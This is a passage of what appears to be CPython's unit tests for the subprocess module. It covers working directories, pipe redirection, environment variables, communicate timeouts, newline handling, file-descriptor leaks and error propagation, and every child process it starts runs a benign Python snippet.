self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
original_cwd = os.getcwd()
os.chdir(cwd)
cwd = os.getcwd()
os.chdir(original_cwd)
return cwd
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with script_helper.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
self.addCleanup(p.stderr.close)
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.addCleanup(p.stdout.close)
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') is not None,
'the python library cannot be loaded '
'with an empty environment')
def test_empty_env(self):
with subprocess.Popen([sys.executable, "-c",
'import os; '
'print(list(os.environ.keys()))'],
stdout=subprocess.PIPE,
env={}) as p:
stdout, stderr = p.communicate()
self.assertIn(stdout.strip(),
(b"[]",
# Mac OS X adds __CF_USER_TEXT_ENCODING variable to an empty
# environment
b"['__CF_USER_TEXT_ENCODING']"))
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises((ValueError, TypeError)):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises((ValueError, TypeError)):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the enviroment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises((ValueError, TypeError)):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# null character in the enviroment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises((ValueError, TypeError)):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# equal character in the enviroment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# equal character in the enviroment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_ouput(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
p.stdin.write("line1\n")
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
old_getpreferredencoding = locale.getpreferredencoding
# Indirectly via io.TextIOWrapper, Popen() defaults to
# locale.getpreferredencoding(False) and earlier in Python 3.2 to
# locale.getpreferredencoding().
def getpreferredencoding(do_setlocale=True):
return encoding
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
try:
locale.getpreferredencoding = getpreferredencoding
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args, universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
stdout, stderr = popen.communicate(input='')
finally:
locale.getpreferredencoding = old_getpreferredencoding
self.assertEqual(stdout, '1\n2\n3\n4')
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
# Windows raises IOError. Others raise OSError.
with self.assertRaises(EnvironmentError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = mkstemp()
ofhandle, ofname = mkstemp()
efhandle, efname = mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
# context manager
class _SuppressCoreFiles(object):
"""Try to prevent core files from being created."""
old_limit = None
def __enter__(self):
"""Try to save previous ulimit, then set it to (0, 0)."""
if resource is not None:
try:
self.old_limit = resource.getrlimit(resource.RLIMIT_CORE)
resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
except (ValueError, resource.error):
pass
if sys.platform == 'darwin':
# Check if the 'Crash Reporter' on OSX was configured
# in 'Developer' mode and warn that it will get triggered
# when it is.
#
# This assumes that this context manager is used in tests
# that might trigger the next manager.
value = subprocess.Popen(['/usr/bin/defaults', 'read',
'com.apple.CrashReporter', 'DialogType'],
stdout=subprocess.PIPE).communicate()[0]
if value.strip() == b'developer':
print("this tests triggers the Crash Reporter, "
"that is intentional", end='')
sys.stdout.flush()
def __exit__(self, *args):
"""Return core file behavior to default."""
if self.old_limit is None:
return
if resource is not None:
try:
resource.setrlimit(resource.RLIMIT_CORE, self.old_limit)
except (ValueError, resource.error):
pass
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
else:
self.fail("chdir to nonexistant directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_restore_signals(self):
